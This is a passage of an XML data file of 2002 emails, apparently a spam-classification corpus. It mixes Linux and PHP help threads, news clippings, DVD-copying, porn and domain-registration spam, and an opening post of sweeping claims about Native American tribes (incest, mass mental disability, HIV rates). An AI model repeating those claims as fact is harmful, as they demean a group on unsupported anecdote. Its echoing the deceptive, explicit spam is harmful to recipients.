 Somewhat annoying, the Federal government semi-regularly grants valuable
 assets to these tribes when they've burned through the ones previously given
 where feasible, typically selling the assets to American or foreign
 companies.  And the cycle continues.
 So what is the primary problem for the tribes that have problems?  In a
 nutshell, a thoroughly pathological culture and society.
 Few women reach the age of 16 without getting pregnant.  Incest, rape, and
 gross promiscuity is rampant.  Inbreeding, heavy drug abuse during
 pregnancy, and other environmental factors have created tribes where a very
 substantial fraction of the tribe is literally mentally retarded.  Many of
 the thoughtful and intelligent tribe members leave the reservation at the
 earliest opportunity, mostly to avoid the problems mentioned above.  On one
 reservation my parents lived, the HIV infection rate was &gt;70%.  Many of
 these societies are thoroughly corrupt, and the administration of the law is
 arbitrary and capricious (they do have their own judges, courts, police
 etc).
 In short, many of these tribes that are still hanging together are in a
 shambles because they have become THE most pathological societies that I
 have ever seen anywhere.  Because of their legal status, there really aren't
 that many consequences for their behavior.  There are many things that I
 could tell you that I've seen that you probably would not believe unless
 you'd seen it yourself.  There are always good people in these tribes, but
 it has gotten to the point where the losers and idiots outnumber the good
 guys by a fair margin many times, and this IS a mobocracy typically.  (BTW,
 if any of you white folk wants to experience overt and aggressive racism as
 a minority in a place where the rule of law is fiction and the police are
 openly thugs, try living on one of these messed up Indian reservations.  It
 will give you an interesting perspective on things.)
 There are only two real situations where you find reasonably prosperous
 Indians.  The first is in the rare case of tribes run by disciplined and
 intelligent people that have managed their assets wisely.  The second is
 where the tribe has dispersed and assimilated for the most part, even if
 they maintain their tribal identity.  In both of these cases, the tribal
 leaders reject the insular behavior that tends to lead to the pathological
 cases mentioned above.
 The Indians are often quite wealthy technically, and a lot of money is spent
 by the tribe per capita.  And the actual reportable income is quite high
 when you consider how many are living entirely off the tribal dole.  It is
 just that their peculiar economic structure does not lend itself well to
 ordinary economic analysis by merely looking at their nominal income.  The
 poverty is social and cultural in nature, not economic.  This was my
 original point.
 On a tangent:
 One thing that has always interested me is the concept of quasi-tribal
 corporate socialism.  Many Indian tribes implement a type of corporate
 socialism that is mind-bogglingly bad in execution.  That they use this
 structure at all is an accident of history more than anything.  But what has
 interested me is that the very smartly managed ones do surprisingly well
 over the long run.  It is like a Family Corporation writ large.
 It seems that in a future where "familial" ties will be increasingly
 voluntary, the general concept may have some merit in general Western
 society, serving to create a facsimile of a biological extended family with
 the included dynamics, but with an arbitrary set of self-selecting
 individuals.
 Damn that was long (and its late), and it could have been a lot longer.
 -James Rogers
  jamesr@best.com 
 On 9/22/02 3:53 PM, "John Hall" &lt;johnhall@evergo.net&gt; wrote:
 &gt; 
 &gt; As I understand it, there is a huge difference between native Americans
 &gt; who speak english at home and those who do not.  I don't have figures
 &gt; that separate those at hand, though.
 &gt; 
 &gt; 1989 American Indians (US Pop as a whole) -- Families below poverty
 &gt; 27.2% (10%), Persons below poverty 31.2 (13.1), Speak a language other
 &gt; than English 23 (13.8) Married couple families 65.8 (79.5) Median family
 &gt; income $21,619 ($35,225) Per Capita $8,284 ($14,420).
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] C++ and C Mailing Lists for Beginners and Advanced
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 12:51:29PM +0200, David Neary wrote:
 &gt; Also, you should keep a bookmark pointing at the comp.lang.c FAQ at 
 &gt; http://www.eskimo.com/~scs/C-faq/top.html
 and don't forget the c iaq.  that's here:
     http://www.plethora.net/~seebs/faqs/c-iaq.html
 an example:
     1.3: If I write the code int i, j; can I assume that (&amp;i + 1) == &amp;j?
     Only sometimes. It's not portable, because in EBCDIC, i and j are not
     adjacent.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</si>
  <si>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[zzzzteana] Dracula theme park could be switched to Bucharest
</t>
  </si>
  <si>
    <t xml:space="preserve">Ananova: 
 Dracula theme park could be switched to Bucharest
 A controversial scheme to build a Dracula theme park in Romania could be
 switched away from Transylvania.
 Consultants PricewaterhouseCoopers is now recommending that it be built in
 Bucharest instead.
 It comes after Prince Charles led international protests against the
 original proposals to build it in the medieval town of Sigishoara.
 PricewaterhouseCoopers name Bucharest, originally believed to be an outsider
 in the race to host the park, as the most profitable location for the
 project.
 But that has angered residents in Sigishoara, where Vlad the Impaler, the
 inspiration for Dracula, was born. They are counting on the park to boost
 the local economy.
 Evenimentul Zilei reports that Sigishoara was placed behind the capital with
 the Black Sea port of Constanta third choice.
 Dorin Danesan, mayor of Sigishoara, said: "The pre-feasibility report from
 PWC shows that the park would attract more tourists if it was located in
 Bucharest. But I still think that Sigishoara is the best location for it."
 The park would include hotels, a Dracula roller coaster, catacombs, a ghost
 train and a house of horrors, as well as vampire dungeons located around a
 reconstruction of Dracula's castle and an artificial lake.
 The project has also been objected to by the world heritage organisation
 Unesco fearing Sigishoara might be spoilt.
 PricewaterhouseCoopers is to present its final report on the project on
 October 15.
 Story filed: 13:16 Tuesday 8th October 2002
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: take advantage of this offer                24344
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"1" cellpadding=3D"5" style=3D"border-collapse: collapse=
 " bordercolor=3D"#111111" width=3D"527" height=3D"299" id=3D"AutoNumber1"&gt;
     &lt;tr&gt;
       &lt;td width=3D"527" height=3D"299" rowspan=3D"2" bgcolor=3D"#C0C0C0"&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5"&gt;Copy
       &lt;font color=3D"#ff0000"&gt;ANY DVD&lt;/font&gt; with a CD-R Burner!&lt;/font&gt;&lt;/b=
 &gt;&lt;/p&gt;
       &lt;p align=3D"left"&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;&lt;b&gt;DVD Wizard Pr=
 o &lt;/b&gt;is the 
       most technologically advanced method of DVD reproduction ever availa=
 ble!
       &lt;b&gt;&lt;font color=3D"#ff0000"&gt;Do not be fooled&lt;/font&gt;&lt;/b&gt; by other fly =
 by night 
       websites offering outdated information.&lt;br&gt;
       &lt;/font&gt;&lt;br&gt;
       &lt;font face=3D"Verdana" size=3D"2"&gt;Our package will show you how to &lt;=
 b&gt;backup 
       any DVD&lt;/b&gt; or &lt;b&gt;VHS cassette&lt;/b&gt; using a &lt;b&gt;&lt;font color=3D"#ff0000=
 "&gt;CD-R 
       burner&lt;/font&gt;&lt;/b&gt;! We will go further, and show you how to backup a =
 DVD 
       using a DVD-R, or DVD-RW burner as well.&lt;/font&gt; &lt;/p&gt;
       &lt;p align=3D"left"&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;Make &lt;b&gt;quality =
 backups&lt;/b&gt; 
       of your personal DVD's and VHS cassettes. Create your own
       &lt;font color=3D"#ff0000"&gt;&lt;b&gt;DVD library&lt;/b&gt;&lt;/font&gt;. Never worry about=
       scratching or losing a DVD again!&lt;/font&gt; &lt;/p&gt;
       &lt;p align=3D"left"&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;&lt;b&gt;&lt;font color=3D=
 "#ff0000"&gt;DVD 
       Wizard Pro &lt;/font&gt;&lt;/b&gt;is &lt;b&gt;completely unlike&lt;/b&gt; anything our compe=
 titors 
       are offering, and it's &lt;b&gt;fully guaranteed&lt;/b&gt;... &lt;/font&gt;&lt;/p&gt;
       &lt;hr color=3D"#000000"&gt;
       &lt;p align=3D"center"&gt;
       &lt;font face=3D"Verdana" size=3D"4"&gt;
       &lt;a href=3D"http://www.money-helps.com/dvd/home.htm"&gt;Order Today&lt;/a&gt;&lt;=
 /font&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;, you won't be disappointed!&lt;/font=
 &gt;&lt;/p&gt;
       &lt;div align=3D"center"&gt;
         &lt;b&gt;&lt;font face=3D"Verdana" size=3D"5"&gt;Limited Time&lt;br&gt;
         &lt;font color=3D"#ff0000"&gt;Only $39.95!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
       &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;We have sold t=
 his package 
       for &lt;b&gt;&lt;u&gt;as much as $69.95&lt;/u&gt;&lt;/b&gt;... but now, for a very limited t=
 ime 
       only, we are offering instant access for&lt;b&gt; only $39.95&lt;/b&gt;!&lt;/font&gt;&lt;=
 /p&gt;
       &lt;p align=3D"left"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana" size=3D"4"&gt;
       &lt;a href=3D"http://www.money-helps.com/dvd/home.htm"&gt;Go Here and 
       order a copy today&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"1" face=3D"Tahoma"&gt;Your
       email address was obtained from an opt-in list. Opt-in MRSA List&lt;br&gt;
       &amp;nbsp;Purchase Code # 31212-1-01210.&amp;nbsp;&amp;nbsp;If you wish to be un=
 subscribed
       from this list, please &lt;/font&gt;&lt;font color=3D"#ffffff" size=3D"1" fac=
 e=3D"Tahoma"&gt; 
       &lt;a href=3D"http://www.money-helps.com/removes/remove.htm"&gt;Click
       here&lt;/a&gt;&lt;/font&gt;&lt;font size=3D"1" face=3D"Tahoma"&gt; and press send to b=
 e removed. If you have previously unsubscribed
       and are still receiving this message, you may email our &lt;/font&gt;&lt;font=
  color=3D"#ffffff" size=3D"1" face=3D"Tahoma"&gt; 
       &lt;a href=3D"mailto:sortofridiculous@bigfoot.com?Subject=3DAbuse Repor=
 t"&gt;Spam
       Abuse Control Center&lt;/a&gt;&lt;/font&gt;&lt;font size=3D"1" face=3D"Tahoma"&gt;. We=
  do not 
       condone spam in any shape or form. Thank You kindly for your coopera=
 tion&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Eugen Leitl wrote:
 &gt; On Fri, 6 Sep 2002, CDale wrote:
 &gt; 
 &gt; &gt; It also depends on what the fad is or what is in style.  (:
 &gt; 
 &gt; DNA's idea of fads is on the 100 kiloyear scale, unfortunately. As long as
 &gt; current fads don't involve in-vivo rewrite of the genome, homeoboxes
 &gt; including (now there's a problem for you, homeoboxing the adult), they're
 &gt; not all that smart an idear.
 I forgot what we were taking about.  (:
 &gt;  
 &gt; &gt; Actualy our silly antiquated ideas about relationships and love have
 &gt; &gt; resulted in the bleedings of many upon many a page (and musical
 &gt; &gt; instrumnet, and canvas)  What's the problem if we dash a little Mrs.
 &gt; 
 &gt; Art is sure nice. However, if art is our first priority we're kinda
 &gt; fux0red, if we've set our sight on a sustainable culture.
 Nah, didn't say art's our priority.  Said our ideas about relationships 
 and love are.  
 &gt; &gt; And let me tell you this: just because a child happens to be
 &gt; &gt; single-parented (what a word), does not mean that child is
 &gt; &gt; dysfunctional or lives in a dysfunctional home.  The govt/media/church
 &gt; 
 &gt; Our firmware is not built to be single-parented. You can counteract that
 &gt; somewhat by exposing the kid to a community of close friends, but not too
 &gt; many do that.
 I see it a lot in the south. Also family.
 &gt; 
 &gt; &gt; has tried to make it look like there is a disintegration, when in
 &gt; &gt; fact, there is a coming together of other family members and friends
 &gt; &gt; to raise children.  It's not decaying -- it's changing.  Nothing wrong
 &gt; &gt; with change.
 &gt; 
 &gt; I don't know what exactly is wrong, but something is definitely wrong.  
 &gt; This is way too important to be left to just our intuition of what is
 &gt; right and what is wrong.
 One thing that's wrong is who some of us choose as babysitters.  Too many 
 kids are put in front of the television for hours each day, to be 
 influenced by what the media and government thinks is important.  I 
 learned a long time ago that what they think is important and what is are 
 two different things.  I threw the TV out when Xi was 9.  She's got her 
 own place now, and still doesn't have one.  YaY!  Another thing that's 
 wrong is what goes on in public schools.  Some allow a bit of 
 individuality, but only for a class or a short period of time, depending 
 on the teachers, most of the time.  I dunno how many times I've seen Xi 
 come home from school absolutely miserable or outraged about something 
 that happened at school.  She made it to college, though, whew.  It's a 
 big problem to tackle, and I don't know the answer.  I like the idea of 
 the voucher system, because in a way it is a way parents can vote more 
 efficiently for how their kids are taught.
 &gt;   &gt; &gt; &gt; At least from the viewpoint of demographics sustainability and
 &gt; &gt; &gt; counterpressure to gerontocracy and resulting innovatiophobia we're doing
 &gt; &gt; &gt; something wrong.
 &gt; &gt; &gt; 
 &gt; &gt; &gt; Maybe we should really go dirty Tleilaxu all the way.
 &gt; &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; Maybe y'all should buy m-w some more bandwidth.
 &gt; 
 &gt; m-w?
 &gt; 
 merriam-webster.  (:
 C
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BIZ, .INFO, .COM for only $14.95 (5026HbTl0-754G@13)
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C3_60B88E3C.B6533E22
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 eyVSQU5EfQ0KUFVCTElDIEFOTk9VTkNFTUVOVDoNCg0KVGhlIG5ldyBkb21h
 aW4gbmFtZXMgYXJlIGZpbmFsbHkgYXZhaWxhYmxlIHRvIHRoZSBnZW5lcmFs
 IHB1YmxpYyBhdCBkaXNjb3VudCBwcmljZXMuIE5vdyB5b3UgY2FuIHJlZ2lz
 dGVyIG9uZSBvZiB0aGUgZXhjaXRpbmcgbmV3IC5CSVogb3IgLklORk8gZG9t
 YWluIG5hbWVzLCBhcyB3ZWxsIGFzIHRoZSBvcmlnaW5hbCAuQ09NIGFuZCAu
 TkVUIG5hbWVzIGZvciBqdXN0ICQxNC45NS4gVGhlc2UgYnJhbmQgbmV3IGRv
 bWFpbiBleHRlbnNpb25zIHdlcmUgcmVjZW50bHkgYXBwcm92ZWQgYnkgSUNB
 Tk4gYW5kIGhhdmUgdGhlIHNhbWUgcmlnaHRzIGFzIHRoZSBvcmlnaW5hbCAu
 Q09NIGFuZCAuTkVUIGRvbWFpbiBuYW1lcy4gVGhlIGJpZ2dlc3QgYmVuZWZp
 dCBpcyBvZi1jb3Vyc2UgdGhhdCB0aGUgLkJJWiBhbmQgLklORk8gZG9tYWlu
 IG5hbWVzIGFyZSBjdXJyZW50bHkgbW9yZSBhdmFpbGFibGUuIGkuZS4gaXQg
 d2lsbCBiZSBtdWNoIGVhc2llciB0byByZWdpc3RlciBhbiBhdHRyYWN0aXZl
 IGFuZCBlYXN5LXRvLXJlbWVtYmVyIGRvbWFpbiBuYW1lIGZvciB0aGUgc2Ft
 ZSBwcmljZS4gIFZpc2l0OiBodHRwOi8vd3d3LmFmZm9yZGFibGUtZG9tYWlu
 cy5jb20gdG9kYXkgZm9yIG1vcmUgaW5mby4NCiANClJlZ2lzdGVyIHlvdXIg
 ZG9tYWluIG5hbWUgdG9kYXkgZm9yIGp1c3QgJDE0Ljk1IGF0OiBodHRwOi8v
 d3d3LmFmZm9yZGFibGUtZG9tYWlucy5jb20uIFJlZ2lzdHJhdGlvbiBmZWVz
 IGluY2x1ZGUgZnVsbCBhY2Nlc3MgdG8gYW4gZWFzeS10by11c2UgY29udHJv
 bCBwYW5lbCB0byBtYW5hZ2UgeW91ciBkb21haW4gbmFtZSBpbiB0aGUgZnV0
 dXJlLg0KIA0KU2luY2VyZWx5LA0KIA0KRG9tYWluIEFkbWluaXN0cmF0b3IN
 CkFmZm9yZGFibGUgRG9tYWlucw0KDQoNClRvIHJlbW92ZSB5b3VyIGVtYWls
 IGFkZHJlc3MgZnJvbSBmdXJ0aGVyIHByb21vdGlvbmFsIG1haWxpbmdzIGZy
 b20gdGhpcyBjb21wYW55LCBjbGljayBoZXJlOg0KaHR0cDovL3d3dy5jZW50
 cmFscmVtb3ZhbHNlcnZpY2UuY29tL2NnaS1iaW4vZG9tYWluLXJlbW92ZS5j
 Z2kNCjMwDQoNCg0KWzk0MzBwSGJUNC04OThsR3lRODA1OWlDdU0zLTQwMGdZ
 cUs3NjYxY1VtRzMtOTE5elJMRDcxNjB2cGh6Mi01MjFUTERANjNdDQo=
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; This is getting better and better. You know 3K is utter shite how? 
 I'm not going to be your spokesman, Eugen.  Figure it out yourself.
 over and out.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] PCTel modules
</t>
  </si>
  <si>
    <t xml:space="preserve">On 0020 -0700 %{!Thu, Sep 05, 2002 at  3:17:36PM -0700}, eric nichols wrote:
 &gt; Hello again. I tried all the suggestions for the PCTel driver and at
 &gt; the end of it, everything still goes smoothly until I type "make"
 &gt; after I get the output from the ./configure. 
 &gt; 
 &gt; However, there were a couple of things I noticed along the way. After typing 
 &gt; * cp configs/kernel-2.4...config .config
 &gt; * make oldconfig
 &gt; * make dep
 &gt; The 2nd to last line I got back said that the modversions.h file was
 &gt; not updated. When I looked at this path to the modversions.h file, it
 &gt; was 281 lines and every line started with a # mark.
 &gt; Is it the case
 &gt; that nothing is read on a line after a # mark (or am I just thinking
 &gt; of another language?) and so should I delete the # at certain places?
 No that is appropriate content for the file.  I'm not a C programmer,
 but I think that these sort of things (#include &lt;blahblah&gt;) are
 instructions to the compiler processed by a pre-processor in the compile
 process, and include all sorts of symbols/functions
 e.g. "#include &lt;math.h&gt;" gives you maths type functions.  Since they
 start with "#" they are ignored in the final compilation.
 Regarding the rest of the compile process, you need to tell the PCtel
 software to look in the right place for the kernel headers/source. 
 I recall from your previous mail that there was a flag
     --with-kernel-includes=/usr/src/linux-2.4
 which could be passed to the ./configure script (with the appropriate
 directory in place of /usr/src/linux-2.4).  This might allow you to
 persuade the code to compile against the correct headers.  I think this
 is the right way to proceed.
 Alternatively, maybe the steps above regarding "make dep" and so forth
 should have been performed in the directory where the make process is
 looking for modversions.h &amp; Co.
 I don't think it is a good idea keep moving files into the directory as
 you describe below.  First of all you will move modversions.h (which you
 have done), then you would have to move all those *.ver files, after
 that, there will almost certainly be a need for further header (*.h)
 files.  This could be quickly done, but is probably bad (those files
 don't really belong there).
 For what it's worth I think you are very close to a successful
 compilation.
 m
 &gt; 
 &gt; Also, when I was in the pctel directory and typed "make", I noticed
 &gt; that a different subdirectory is taken to a different modversions.h
 &gt; file. Inside this other file, there's nothing at all. And so I moved
 &gt; the modversions.h file with 281 lines to the empty modversions.h file
 &gt; - and got a different reply after "make". The output after I moved the
 &gt; file over mostly looked like this:
 &gt; /usr/src/linux-2.4.18-3/linux/modversions.h:11:33:
 &gt; linux/modules/adb.ver: No such file or directory
 &gt; /usr/src/linux-2.4.18-3/linux/modversions.h:12:37:
 &gt; linux/modules/af_ax25.ver: No such file or directory
 &gt; /usr/src/linux-2.4.18-3/linux/modversions.h:13:36:
 &gt; linux/modules/af_ipx.ver: No such file or directory
 &gt; 
 &gt; The odd lines being the path and the first half of the other lines are
 &gt; what's written after the # in the modversions.h file. Should there be
 &gt; a file at each of these (one at each of the 281 lines of the file)
 &gt; that I'd have to compile/make?
 -- 
 Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
 Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Artist Gallery: Troy Paradise
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613678,159/
 Date: 2002-10-06T18:12:42+01:00
 Troy Paradise is a versatile and creative artist with over seven years of 
 experience in the videogames industry, working as a freelance lead artist and 
 college art instructor.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: gentoo 0.11.28 is out..
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 18 Jul 2002 13:00:29 +0200
 Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; Once upon a time, Matthias wrote :
 &gt; &gt; ..see subject.
 &gt; ..see valhalla.freshrpms.net ;-)
 Hi, Matthias,
 You should temporarly remove gentoo 0.11.29 from valhalla.freshrpms.net.
 This build (and 0.11.28) has a strong bug: Problems with copying "deep"
 directories.
 Have reported this to Emil, he looks currently into it, a fix should be
 available soon..
 Sorry
 -- 
 regards from Germany
                    Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Quick php advice needed :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002 10:51:56 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; Sorry, this hasn't got much to do with rpm packages directly ;-)
 &gt; 
 &gt; My "builds" page is getting bigger and bigger, and quite messy as
 &gt; directories are listed in no particular order :
 &gt; http://freshrpms.net/builds...
     Yep.  Make sure there's a field in the database called (for example) "Updated" and when it comes time to generate the list, add "order by updated".  This'll put it in that particular order for ya.  You can also chose to order it by name, etc by changing this field.
     This should be the same for both MySql and Postgressql (any modern SQL, really).  Which are you using?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</si>
  <si>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Subject: MSNBC: Rates Hit 35 year Low 4.75% ...12304
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: College Coeds                         2915
</t>
  </si>
  <si>
    <t xml:space="preserve">
 To be taken off this mailing list, simply hit your
 reply button and put "Remove" anywhere in the subject.
 ----------------------------------------------------------
   If Amateurs is what you want,  Then we Have them.
 Take a look at these HARDCORE sites.  Young HOTTT TEENS !!!
 These are The BEST of the BEST when it comes to Amateurs.
 Don't believe me?   Take a look for yourself.  
   Amateur Petite
 -----------------------
 All Natural TIGHT Coeds !!!
 Petite Natural Breasted Amateurs!!
 Exclusive Amateur XXX Videos !!!
 Hundreds of Exclusive PETITE Amateur MODELS !!
  Click Here to Check Out the ACTION!!!!
  http://tour2.amateurpetite.com/?1087
  http://tour2.amateurpetite.com/?1087
   Ample Amateurs
 -------------------
 Breasts. Women have them, men love them. And for some men (and women!) that old adage
 "The Bigger The Better" holds true! And you'll find PLENTY to hold on to here - Our stable of stacked
 EXCLUSIVE AMPLE AMATEURS will make your mouth water and your hands tired just looking at them!
  http://tour2.ampleamateurs.com/?1087
  http://tour2.ampleamateurs.com/?1087
   Amateur Smut
 ------------------
  The Smuttiest XXX Amateurs on the Web !!!
  Real Amateurs in Explicit Photo Shoots
  1,000's of HIGH Quality Smut Pics !!!
  Pics of "The Horny Girl Next Door"
  Nasty Amateurs Gone WILD!!!
  http://tour1.amateursmut.com/?1087
  http://tour1.amateursmut.com/?1087
 -------------------------------------------------------------
 To be taken off this mailing list, simply hit your
 reply button and put "Remove" anywhere in the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Lincs lizard
</t>
  </si>
  <si>
    <t xml:space="preserve">http://yorkshirepost.co.uk/scripts/editorial2.cgi?cid=news&amp;aid=481687
 2.5ft lizard 'abandoned' at resort
 Holidaymakers at a seaside resort were stunned to find a 2.5ft lizard
 sunning itself at a caravan park close to a beach.
 The savannah monitor lizard was captured at Chapel St Leonards, Lincs, on
 Sunday by a member of the public before being collected by an RSPCA team.
 RSPCA officer Justin Stubbs, who took the lizard to a specialist carer,
 said: "Savannah monitors can give a nasty bite and we certainly wouldn't
 have wanted one loose in a busy holiday resort for long."
 Officials believe the animal may have been abandoned by a private owner
 because it has not been reported missing.
 Savannah monitor lizards originate in Africa and are carnivorous, eating
 rats and small rodents. They can grow to 4ft in length.
 Anyone with information about the lizard can contact the RSPCA in confidence
 on 08705 555 999.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 4 Sep 2002, Gordon Mohr wrote:
 --]Hmm. Seems like every CD player should include the
 --]capability to rip, encode, and cache the last few CDs
 --]inserted.
 There are companies doing just that, but given the current state of the
 DRm sceen and the litigiouness of the RIAA, who wants to go down like
 circus seals?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Production Mini-plants in mobile containers. Co-investment Program
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format
 --=_NextPart_2rfkindysadvnqw3nerasdf
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 The Financial News, May 2002
 Production Mini-plants in mobile containers. Co-investment Program
 =22...Science Network will supply to countries and developing regions the technology and the necessary support for the production in series of Mini-plants in mobile=20containers (40-foot). The Mini-plant system is designed in such a way that all the production machinery is fixed on the platform of the container, with all wiring,=20piping, and installation parts; that is to say, they are fully equipped... and the mini-plant is ready for production.=22
 More than 700 portable production systems: Bakeries, Steel Nails, Welding Electrodes, Tire Retreading, Reinforcement Bar Bending for Construction Framework,=20Sheeting for Roofing, Ceilings and Fa=E7ades, Plated Drums, Aluminum Buckets, Injected Polypropylene Housewares, Pressed Melamine Items (Glasses, Cups,=20Plates, Mugs, etc.), Mufflers, Construction Electrically Welded Mesh, Plastic Bags and Packaging, Mobile units of medical assistance, Sanitary Material,=20Hypodermic Syringes, Hemostatic Clamps, etc.=20
 Science Network has started a process of Co-investment for the installation of small Assembly plants to manufacture in series the Mini-plants of portable=20production on the site, region or country where they may be required. One of the most relevant features is the fact that these plants will be connected to the World=20Trade System (WTS) with access to more than 50 million raw materials, products and services and automatic transactions for world trade.
 Because of financial reasons, involving cost and social impact, the right thing to do is to set up assembly plants in the same countries and regions, using local=20resources (labor, some equipment, etc.)
 For more information: &lt;A HREF=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plants in mobile containers&lt;/A&gt;
 By Steven P. Leibacher, The Financial News, Editor
 Mini-plantas de produccion en contenedores moviles. Programa de Co-inversion
 =22...Science Network suministrara a paises y regiones en vias de desarrollo la tecnologia y el apoyo necesario para la fabricacion en serie de Mini-plantas de=20produccion en contenedores moviles (40-foot). El sistema de mini-plantas esta dise=F1ado de forma que todas las maquinas de produccion van instaladas fijas=20sobre la propia plataforma del contenedor, con el cableado, tuberias e instalaciones; es decir, completamente equipadas... y a partir de ese momento est=E1n listas=20para producir.=22=20
 Mas de 700 sistemas de produccion portatil: Panaderias, Producci=F3n de clavos de acero, Electrodos para soldadura, Recauchutado de neumaticos, Curvado de=20hierro para armaduras de construccion, Lamina perfilada para cubiertas, techos y cerramientos de fachada, Bidones de chapa, Cubos de aluminio, Menaje de=20polipropileno inyectado, Piezas de melamina prensada (vasos, platos, tazas, cafeteras, etc.) Silenciadores para vehiculos, Malla electrosoldada para la=20construccion, Bolsas y envases de plastico, Unidades moviles de asistencia medica, Material sanitario (jeringas hipodermicas, Pinzas hemostaticas, etc.)
 Science Network ha puesto en marcha un proceso de Co-inversion para la instalacion de peque=F1as Plantas ensambladoras para fabricar en serie las Mini-plantas=20de produccion portatil, en el lugar, region o pais que lo necesite. Una de las caracter=EDsticas relevantes es el hecho de que dichas plantas quedaran conectadas al=20Sistema del Comercio Mundial (WTS) con acceso a mas de 50 millones de mercancias, materia primas, productos, servicios y las operaciones automaticas de=20comercio internacional.=20
 Resulta obvio que por razones economicas, de costes y de impacto social, lo apropiado es instalar plantas ensambladoras en los mismos paises y regiones asi=20como utilizar los recursos locales (mano de obra, ciertos equipamientos, etc.)
 Para recibir mas infromacion: &lt;A HREF=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plantas de produccion en contenedores moviles&lt;/A&gt;
 Steven P. Leibacher, The Financial News, Editor
 -------------------------------------------------------------------------
 If you received this in error or would like to be removed from our list, please return us indicating: remove or un-subscribe in 'subject' field, Thanks. &lt;A=20HREF=3D=22mailto:newsletters=40the-financial-news.com=22&gt; Editor&lt;/A&gt;
 =A9 2002 The Financial News. All rights reserved.
 --=_NextPart_2rfkindysadvnqw3nerasdf
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;meta http-equiv=3D=22content-type=22 content=3D=22text/html;CHARSET=3Diso8859-1=22&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D=22=23FFFFFF=22&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;B&gt;The Financial News, May 2002&lt;/B&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;BR&gt;
 &lt;BR&gt;
